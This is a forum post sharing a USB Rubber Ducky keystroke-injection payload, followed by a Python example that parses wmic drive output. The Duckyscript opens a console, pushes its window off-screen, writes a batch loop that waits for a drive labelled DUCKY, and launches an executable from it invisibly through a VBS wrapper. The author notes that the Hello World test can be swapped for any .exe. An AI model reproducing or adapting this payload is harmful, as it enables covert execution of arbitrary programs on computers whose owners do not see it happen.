2013-06-25 01:17:59 +02:00
The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. The file that gets launched can be changed to an .exe; I am just having it run a batch file for testing purposes. The line that says "STRING START %myd%\HelloWorld.exe" is the one that launches the file from the mounted drive, so change the file name there to match whatever you put on the SD card.
```
REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.

REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000

GUI R

DELAY 1000

STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
REM Move the console window off-screen: system menu, Move, then Down 100 times.
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
REM One line: wmic lists volumes, findstr keeps the line carrying the DUCKY label,
REM and for /f takes its first token (the drive letter). The ^ escapes keep the
REM comma and the pipe inside the quoted command instead of cmd eating them.
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
REM myd is only set once the DUCKY volume shows up; testing "if exist %myd%" with an
REM empty variable is a syntax error and would kill the loop on the first pass.
STRING if defined myd (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE (hidden window, inherits %TEMP% as working directory)
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
```
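The waiting loop above leans on a cmd idiom: pipe `wmic volume get driveletter, label` through `findstr "DUCKY"` and let `for /f` take the first whitespace-delimited token of each matching line. That idiom has two edge cases worth knowing before you rely on it: `findstr` matches the substring anywhere on the line (a volume labeled BACKUP_DUCKY matches too), and because `set` runs once per matching line, the drive letter you end up with is the one from the last match, not the first. The Python below is an added example written for this page, not part of the payload or of midnightsnake's code; the wmic output it parses is constructed by hand, and the function names are mine. It mimics the batch idiom next to a column-aware parser that uses the header line to slice wmic's fixed-width table, so an empty DriveLetter cell (recovery or EFI volumes) cannot shift the tokens and only an exact label match counts.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of what `wmic volume get driveletter, label` prints on a
# Windows box (made up for this example, not captured from a real machine):
# a fixed-width header line, then one row per volume. Volumes such as the
# recovery partition carry a label but no drive letter.
SAMPLE_WMIC_OUTPUT = (
    "DriveLetter  Label         \r\n"
    "C:           Windows       \r\n"
    "             Recovery      \r\n"
    "E:           DUCKY         \r\n"
    "F:           BACKUP_DUCKY  \r\n"
    "\r\n"
)


def parse_wmic_table(output: str) -> List[Dict[str, str]]:
    """Parse wmic's fixed-width table into a list of {column: value} dicts.

    Column boundaries come from the header line, so an empty cell (a volume
    with no drive letter) stays empty instead of shifting the row's tokens.
    """
    lines = [ln for ln in output.splitlines() if ln.strip()]
    if not lines:
        return []
    header, rows = lines[0], lines[1:]
    cols = list(re.finditer(r"\S+", header))
    names = [m.group(0) for m in cols]
    starts = [m.start() for m in cols]
    bounds = list(zip(starts, starts[1:] + [None]))
    return [
        {name: row[a:b].strip() for name, (a, b) in zip(names, bounds)}
        for row in rows
    ]


def naive_first_token(output: str, needle: str) -> Optional[str]:
    """Mimic the batch idiom on the page:
        for /f %%d in ('wmic ... ^| findstr "DUCKY"') do set myd=%%d
    findstr keeps every line containing the needle, for /f yields the first
    whitespace-delimited token of each, and `set` keeps the LAST one.
    """
    result = None
    for line in output.splitlines():
        if needle in line and line.strip():
            result = line.split()[0]
    return result


def find_drive_letter(output: str, label: str) -> Optional[str]:
    """Drive letter of the volume whose Label equals `label` exactly,
    or None if there is no such volume or it has no drive letter."""
    for row in parse_wmic_table(output):
        if row.get("Label") == label:
            return row.get("DriveLetter") or None
    return None


if __name__ == "__main__":
    # On the sample the batch idiom picks up F: (last substring match),
    # while the column-aware lookup returns the real DUCKY volume, E:.
    print("batch idiom  :", naive_first_token(SAMPLE_WMIC_OUTPUT, "DUCKY"))
    print("exact lookup :", find_drive_letter(SAMPLE_WMIC_OUTPUT, "DUCKY"))
```

If you want the same exactness in the batch file itself, the cheap fix is to anchor the pattern with findstr's regex mode (`findstr /R /C:" DUCKY *$"`) so a label that merely contains DUCKY is not matched, and to accept the first match only by leaving the loop as soon as `myd` is set.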
The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything runs invisibly, so to confirm it worked you will need to check for the existence of "Message.txt". It is written to the working directory of the waiting batch file, which is %TEMP% because of the CD %TEMP% line above (earlier versions without that line left it in "C:\Windows\system32").
```
REM Batch file launched from the DUCKY drive; writes Message.txt as proof of execution
echo Hello World!!!
echo Hello World!!! > Message.txt
```
The encoders now support the REPEAT command, so this should only be a problem if you are using an old encoder. Encoders also now support blank lines in the Duck Script, so the sections of the payload have been separated with blank lines.